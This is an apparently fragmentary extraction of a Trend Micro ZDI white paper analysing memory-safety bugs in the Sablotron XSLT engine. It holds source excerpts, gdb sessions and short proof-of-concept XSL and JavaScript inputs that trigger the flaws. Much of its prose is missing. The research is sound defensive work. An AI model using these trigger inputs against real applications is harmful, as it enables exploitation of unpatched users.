a trend micro white paper | may 2017 - squarespace · a trend micro white paper | may 2017 page 2...
TRANSCRIPT
![Page 1: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/1.jpg)
A Trend Micro White Paper | May 2017
>>
![Page 2: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/2.jpg)
A Trend Micro White Paper | May 2017
Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
................................................................................................................................................... 4
............................................................................................................ 4
..................................................................................................... 4
..................................................................... 6
....................................................................... 6
................................................................................................................................ 7
................................................................................................................................. 7
................................................................................................. 16
.................................................................... 16
................................................................................................. 22
...................................................................................... 26
...................................................................................... 32
............................................................................................... 39
.......................................................................................... 44
.................................................................................................................................... 46
WRITTEN BY:
Brian Gorenc, Abdul-Aziz Hariri, and Jasiel Spelman of the Trend Micro
Zero Day Initiative
![Page 3: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/3.jpg)
A Trend Micro White Paper | May 2017
Page 3 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 4: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/4.jpg)
A Trend Micro White Paper | May 2017
Page 4 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
xsl:choose
xsl:attribute
xsl:copy
xsl:copy-of
Node-Set
String
Boolean
Number
<?xml version="1.0" encoding="UTF-8"?>
<catalog>
<cd>
<title>Empire Burlesque</title>
<artist>Bob Dylan</artist>
<country>USA</country>
<company>Columbia</company>
<price>10.90</price>
<year>1985</year>
</cd>
<cd>
<title>Hide your heart</title>
<artist>Bonnie Tyler</artist>
<country>UK</country>
<company>CBS Records</company>
<price>9.90</price>
<year>1988</year>
</cd>
<cd>
</catalog>
![Page 5: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/5.jpg)
A Trend Micro White Paper | May 2017
Page 5 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
<h2>My CD Collection</h2>
<table border="1">
<tr bgcolor="#9acd32">
<th style="text-align:left">Title</th>
<th style="text-align:left">Artist</th>
</tr>
<xsl:for-each select="catalog/cd">
<tr>
<td><xsl:value-of select="title"/></td>
<td><xsl:value-of select="artist"/></td>
</tr>
</xsl:for-each>
</table>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
![Page 6: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/6.jpg)
A Trend Micro White Paper | May 2017
Page 6 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
var xmlDoc = "<x/>";
var xslDoc = "<xsl:stylesheet
xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"
version=\"1.0\"> <xsl:template match=\"/\"> <xsl:for-each
select=\"a\">
<xsl:sort select=\"(/)/*[a()]\"/>
</xsl:for-each> </xsl:template></xsl:stylesheet>";
var x = XMLData.parse(xmlDoc, false);
var oNode = x.nodes.item(0);
oNode.applyXSL(xslDoc);
![Page 7: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/7.jpg)
A Trend Micro White Paper | May 2017
Page 7 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
base.h enum
enum XSL_OP
{
XSL_APPLY_IMPORTS, XSL_APPLY_TEMPLATES,
XSL_ATTRIBUTE, XSL_ATTRIBUTE_SET,
XSL_CALL_TEMPLATE, XSL_CHOOSE,
XSL_COMMENT, XSL_COPY, XSL_COPY_OF,
XSL_DECIMAL_FORMAT, XSL_ELEMENT,
XSL_FALLBACK, XSL_FOR_EACH,
XSL_IF, XSL_IMPORT,
XSL_INCLUDE, XSL_KEY,
XSL_MESSAGE, XSL_NAMESPACE_ALIAS,
XSL_NUMBER, XSL_OTHERWISE,
XSL_OUTPUT, XSL_PARAM,
XSL_PRESERVE_SPACE, XSL_PROCESSING_INSTR,
XSL_SORT, XSL_STRIP_SPACE,
XSL_STYLESHEET, XSL_TEMPLATE,
XSL_TEXT, XSL_TRANSFORM,
XSL_VALUE_OF, XSL_VARIABLE,
XSL_WHEN, XSL_WITH_PARAM,
XSL_NONE
![Page 8: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/8.jpg)
A Trend Micro White Paper | May 2017
Page 8 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
};
XSLElement
class XSLElement : public Element
{
public:
XSLElement(Tree& owner_, QName&, XSL_OP);
virtual eFlag execute(Sit S, Context *c, Bool resolvingGlobals);
virtual eFlag newChild(Sit S, Vertex*);
eFlag checkToplevel(Sit S);
virtual eFlag checkChildren(Sit S);
void checkExtraChildren(int& k);
Expression* getAttExpr(XSL_ATT);
virtual int strip();
XSL_OP op;
eFlag checkAtts(Sit S);
private:
eFlag makeSortDefs(Sit S, SortDefList &sortDefs, Context *c);
eFlag make1SortDef(Sit S, SortDef *&def, Context *c);
};
XSLElement::execute
expr.h
expr.cpp Expression::callFunc
Expression::callFunc
case EXFF_LAST:
{
checkArgsCount(0);
retxpr.setAtom( Number(c -> getSize()) );
}; break;
case EXFF_POSITION:
{
checkArgsCount(0);
retxpr.setAtom( Number(c -> getPosition() + 1) );
}; break;
case EXFF_COUNT:
{
checkArgsCount(1);
checkIsNodeset(0);
retxpr.setAtom(
Number(atoms[0] -> tonodesetRef().getSize()) );
}; break;
datastr.h
![Page 9: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/9.jpg)
A Trend Micro White Paper | May 2017
Page 9 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
Expression::callFunc
![Page 10: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/10.jpg)
A Trend Micro White Paper | May 2017
Page 10 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
FuncInfoItem
Expression::callFunc FuncInfoItem
![Page 11: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/11.jpg)
A Trend Micro White Paper | May 2017
Page 11 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 12: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/12.jpg)
A Trend Micro White Paper | May 2017
Page 12 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
xslOpNames
&forward-compatible
with-param CT_CHANGE
![Page 13: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/13.jpg)
A Trend Micro White Paper | May 2017
Page 13 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
CT_CHANGE
namerTable
namerTable
![Page 14: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/14.jpg)
A Trend Micro White Paper | May 2017
Page 14 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
isNamer
namerTable
namerTable isNamer
Tokenizer::tryShort isNamer
isNamer
![Page 15: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/15.jpg)
A Trend Micro White Paper | May 2017
Page 15 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
Tokenizer::tryShort
![Page 16: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/16.jpg)
A Trend Micro White Paper | May 2017
Page 16 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
utf8.h utf8.cpp
utf8ToUtf16
XSLElement::execute
eFlag XSLElement::execute(Sit S, Context *c, Bool resolvingGlobals)
{
Attribute *a;
Bool didNotExecute = FALSE;
Processor *proc = NZ(S.getProcessor());
…
case XSL_ATTRIBUTE:
{
QName q;
DStr nameStr;
E( NZ( atts.find(XSLA_NAME) ) -> value(S, nameStr, c) );
if (! isValidQName((char*)nameStr) )
Err1(S, E_INVALID_QNAME, (char*)nameStr);
isValueQName isValidNCName
Bool isValidQName(const char* name)
{
char *local = NULL;
char *start = NULL;
Bool copy = false;
Bool result = TRUE;
char *colon = (char *)strchr(name, ':');
if (colon)
{
//*colon = '\0';
local = colon + 1;
copy = true;
start = new char[colon - name + 1];
strncpy(start, name, colon - name);
start[colon - name] = '\0';
} else {
start = (char*)name;
![Page 17: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/17.jpg)
A Trend Micro White Paper | May 2017
Page 17 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
}
result = isValidNCName(start) && (local == NULL ||
isValidNCName(local));
//if (colon) *colon = ':';
if (copy) delete start;
return result;
}
isValidNCName utf8ToUtf16
Bool isValidNCName(const char* name)
{
int len = utf8StrLength(name);
if (len == 0) return FALSE;
wchar_t *buff = new wchar_t[len + 1];
utf8ToUtf16(buff, name);
Utf8ToUtf16
󠁍 utf8StrLength
int utf8StrLength (const char* text)
{
int len;
for (len = 0; *text; len++) {
if (!(*text & 0x80)) text++;
else text += utf8SingleCharLength(text);
}
return len;
}
int utf8ToUtf16(wchar_t *dest, const char *src)
{
unsigned long code;
int len = 0,
thislen;
for (const char *p = src; *p; p += utf8SingleCharLength(p))
{
code = utf8CharCode(p);
if (code < 0x10000UL)
{
*dest = (wchar_t)(code);
thislen = 1;
![Page 18: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/18.jpg)
A Trend Micro White Paper | May 2017
Page 18 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
}
else
{
dest[0] = 0xd7c0U + (code >> 10);
dest[1] = 0xdc00U | code & 0x3ff;
thislen = 2;
};
dest += thislen;
len += thislen;
}
*dest = 0;
return len;
}
xsl:attribute
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:attribute name="AB󠁍DE"/>
</xsl:template>
</xsl:stylesheet>
![Page 19: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/19.jpg)
A Trend Micro White Paper | May 2017
Page 19 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
utf8ToUtf16
utf8ToUtf16
![Page 20: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/20.jpg)
A Trend Micro White Paper | May 2017
Page 20 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
utf8ToUtf16
![Page 21: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/21.jpg)
A Trend Micro White Paper | May 2017
Page 21 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 22: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/22.jpg)
A Trend Micro White Paper | May 2017
Page 22 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
base.h
#define toV(v) ((Vertex*)v)
#define toNS(v) (cast(NmSpace*,toV(v)))
#define toE(v) (cast(Element*,toV(v)))
#define toX(v) (cast(XSLElement*,toV(v)))
#define toExtension(v) (cast(ExtensionElement*,toV(v)))
#define toA(v) (cast(Attribute*,toV(v)))
#define toText(v) (cast(Text*,toV(v)))
#define toD(v) (cast(Daddy*,toV(v)))
#define toRoot(v) (cast(RootNode*,toV(v)))
#define toComment(v) (cast(Comment*,toV(v)))
#define toPI(v) (cast(ProcInstr*,toV(v)))
EXFF_LANG
Expression::callFunc
case EXFF_LANG:
{
checkArgsCount(1);
checkIsString(0);
// get the argument
Str langQuery;
E( atoms[0] -> tostring(S, langQuery) );
NodeHandle w, att = NULL;
int attCount, i;
const char* langValue = NULL;
for (w = c -> current(); w && !langValue; w = S.dom().getParent(w))
{
// find whether w has an xml:lang attribute
if (!S.domExternal(w)) {
QName searchName;
searchName.setUri(getOwnerTree().unexpand(theXMLNamespace));
searchName.setLocal(getOwnerTree().unexpand("lang"));
int idx = toE(w) -> atts.findNdx(searchName);
toE
#define toE(v) (cast(Element*,toV(v)))
toE
#ifdef _DEBUG
#define cast(TYPE,PTR) (NZ(dynamic_cast<TYPE>(PTR)))
#else
#define cast(TYPE,PTR) ((TYPE) PTR)
![Page 23: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/23.jpg)
A Trend Micro White Paper | May 2017
Page 23 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
#endif
<a>
<abcd/>
</a>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="node()">
<xsl:apply-templates select="node()[lang('foo')]"/>
</xsl:template>
</xsl:stylesheet>
![Page 24: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/24.jpg)
A Trend Micro White Paper | May 2017
Page 24 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 25: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/25.jpg)
A Trend Micro White Paper | May 2017
Page 25 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
__RTDynamicCast
Figure 6 - Patch Details
![Page 26: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/26.jpg)
A Trend Micro White Paper | May 2017
Page 26 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
ExprList
#define checkArgsCount(x) if (atomsNumber != x)\ Err(S,
ET_BAD_ARGS_N);
#define checkArgsCountMax(x) if (atomsNumber > x)\ Err(S,
ET_BAD_ARGS_N);
#define checkArgsCountMin(x) if (atomsNumber < x)\ Err(S,
ET_BAD_ARGS_N);
#define checkArgsCountBetween(x,y) if ((atomsNumber < x) || \
(atomsNumber > y)) Err(S, ET_BAD_ARGS_N);
CheckArgsCount
ExprList ExprList
PList Expressions
ExprList
typedef PList<Expression *> ExprList;
template <class T>
class PList : public List<T>
{
public:
PList(int logBlocksize_ = LIST_SIZE_SMALL);
// free and remove the last pointer
void freelast(Bool);
// free and remove all pointers
void freeall(Bool);
// free and remove the given pointer
void freerm(int, Bool);
};
#define checkArgsCount(x) if (atomsNumber != x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountMax(x) if (atomsNumber > x)\
![Page 27: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/27.jpg)
A Trend Micro White Paper | May 2017
Page 27 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountMin(x) if (atomsNumber < x)\
Err(S, ET_BAD_ARGS_N);
#define checkArgsCountBetween(x,y) if ((atomsNumber < x) || \
(atomsNumber > y)) Err(S, ET_BAD_ARGS_N);
case EXFF_CONTAINS:
{
checkArgsCount(2); //Check if there's two args
checkIsString2(0,1);
Str a0Str, a1Str;
E( atoms[0] -> tostring(S, a0Str) ); //reference arg1
E( atoms[1] -> tostring(S, a1Str) ); //reference arg1
retxpr.setAtom((Bool) (firstOccurence(
a0Str, a1Str) != -1));
}; break;
EXFF_SUBSTRING_BEFORE
EXFF_SUBSTRING_AFTER
case EXFF_SUBSTRING_BEFORE:
case EXFF_SUBSTRING_AFTER:
{
Str strg;
Str theBigger, theSmaller;
E( atoms[0] -> tostring(S, theBigger) );
E( atoms[1] -> tostring(S, theSmaller) );
checkArgsCount(2);
checkIsString2(0,1);
...
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:value-of select="substring-after(.)"/>
![Page 28: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/28.jpg)
A Trend Micro White Paper | May 2017
Page 28 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
</xsl:template>
</xsl:stylesheet>
./sabcmd input.xsl input.xml
Expression::callFunc
atomsNumber
![Page 29: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/29.jpg)
A Trend Micro White Paper | May 2017
Page 29 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
atomsNumber atoms
cmp 0x100261A8 tostring
![Page 30: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/30.jpg)
A Trend Micro White Paper | May 2017
Page 30 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
atoms
![Page 31: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/31.jpg)
A Trend Micro White Paper | May 2017
Page 31 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 32: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/32.jpg)
A Trend Micro White Paper | May 2017
Page 32 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
Expression::eval()
eFlag Expression::eval(Sit S, Expression &retxpr, Context *c, Bool
resolvingGlobals /* = FALSE */){
EXFO_LOCPATH
case EXF_LOCPATH:
case EXFO_UNION:
{
sabassert(c && "context is null!");
newc.assign(c);
E( createContext(S, newc) );
newc.unkeep();
// assign newc directly without copying
retxpr.setAtom((*newc).copy());
newc.del();
}; break;
…
createContext()
eFlag Expression::createContext(Sit S, Context *& c, int baseNdx /* = -1
*/)
case EXF_LOCPATH:
{
E( createLPContext(S, newc, baseNdx) );
newc.unkeep();
}
createLPContextLevel()
eFlag Expression::createLPContextLevel(Sit S,
int stepLevel, int stepsCount, NodeHandle base,
Context &info, Context *theResult)
{
sabassert(functor == EXF_LOCPATH);
int i, j, init,
predsCount = args[stepLevel] -> step -> preds.number(),
lastBad = -1; // last bad predicate, or the step itself
// keep a stack of positions, one for each predicate IN THIS STEP
List<int> reached(predsCount), // serves as position for next pred
totalReached(predsCount); // serves as size for next (bad) pred
![Page 33: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/33.jpg)
A Trend Micro White Paper | May 2017
Page 33 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
// there will be as many dry (size-counting) runs as there are bad
preds
Bool dryRun = TRUE,
quitThisRound = FALSE, quitThisVertex = FALSE;
// i ranges over predicates. Value i==predsCount is the special last
run
for (i = 0; i <= predsCount; i++)
{
if (i == predsCount)
// the last run, not a dry-run
dryRun = FALSE;
// if this is the last run, or if the current pred uses last(),
compute
// the context size
if (!dryRun || args[stepLevel] -> step -> preds[i] -> usesLast)
{
// initialize the size arrays:
// append base values for preds past the last bad one,
// up to this bad one (incl.)
for (init = 0; init <= lastBad; init++)
reached[init] = 0;
for (init = lastBad + 1; init <= i; init++)
{
reached.append(0);
totalReached.append(-1); // -1 just for safety
};
..
} // if bad predicate
} // for, over all preds
return OK;
}
select="A[0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9][0][1
][2][3][4][5][6][7][8][9]"
predsCount
predsCount dryRun
for (init = 0; init <= lastBad; init++)
reached[init] = 0;
for (init = lastBad + 1; init <= i; init++)
{
reached.append(0);
totalReached.append(-1); // -1 just for safety
};
(gdb) p reached
$30 = {_vptr.List = 0xb69e9228 <vtable for List<int>+8>, nItems = 0, block
= 0x0, blocksize = 0, origBlocksize = 1073741824}
(gdb) p/x reached.origBlocksize
![Page 34: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/34.jpg)
A Trend Micro White Paper | May 2017
Page 34 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
$32 = 0x40000000
reached.append(0)
reached
3711 List<int> reached(predsCount), // serves as position for next
pred
3712 totalReached(predsCount); // serves as size for next (bad)
pred
(gdb) s
3735 reached.append(0);
(gdb) s
List<int>::append (this=0xbfffcc20, what=0) at datastr.h:610
if (nItems >= blocksize)
List<int>::append() datastr.h
template <class T>
void List<T>::append(T what)
{
if (nItems >= blocksize)
{
if (block)
grow();
else
{
blocksize = origBlocksize;
block = (T*) claimMemory(blocksize * sizeof(T));
// FIXME: asserting memory request ok
sabassert(block);
}
}
block[nItems++] = what;
};
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:template match="/">
<xsl:value-of
select="A[0][1][2][3][4][5][6][7][8][9][0][1][2][3][4][5][6][7][8][9][0][1
][2][3][4][5][6][7][8][9]"/>
</xsl:template>
</xsl:stylesheet>
./sabcmd input.xsl input.xml
![Page 35: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/35.jpg)
A Trend Micro White Paper | May 2017
Page 35 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
In order to find the vulnerable function, we’ll need to find createLPContext which in turn calls createLPContextLevel. This function contains two calls to the List constructor:
![Page 36: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/36.jpg)
A Trend Micro White Paper | May 2017
Page 36 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 37: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/37.jpg)
A Trend Micro White Paper | May 2017
Page 37 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
origBlockSize
![Page 38: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/38.jpg)
A Trend Micro White Paper | May 2017
Page 38 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
![Page 39: A Trend Micro White Paper | May 2017 - Squarespace · A Trend Micro White Paper | May 2017 Page 2 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed](https://reader033.vdocument.in/reader033/viewer/2022051803/5b00cc967f8b9ab9598b5b47/html5/thumbnails/39.jpg)
A Trend Micro White Paper | May 2017
Page 39 of 46| Trend Micro White Paper Transforming Open Source to Open Access in Closed Applications
guard.h
Expression::createContext newc
EXF_FILTER
case EXF_FILTER:
{
sabassert(baseNdx != -1); // meaningful only for a locpath
NodeHandle wasCurrent = (*newc).getCurrentNode();
E( args[0] -> createContext(S, newc, baseNdx) );
newc.unkeep();
(*newc).setCurrentNode(wasCurrent);
GP( Context ) filteredc;
for (i = 1; i < argsNumber - (int) hasPath; i++)
{
filteredc = new Context(c_orig -> getCurrentNode());
(*newc).reset();
Bool istrue;
int newcNumber = (*newc).getSize();
for (j = 0; j < newcNumber; j++)
{
E(args[i] -> trueFor(S, newc, istrue));
if (istrue)
(*filteredc).append((*newc)[j]);
(*newc).shift();
};
newc.del();
newc = filteredc.keep();
if (!(*newc).getSize()) break;
};
if (hasPath)
{
filteredc.assign(newc);
filteredc = newc; // a patch due to SGI MIPSpro compiler
E( args[argsNumber-1] -> createLPContextSum(S, filteredc,
(*newc).getCurrentNode()) );
newc.del();
newc = filteredc.keep();
}
}
break;
if(hasPath) filteredc newc
filteredc newc
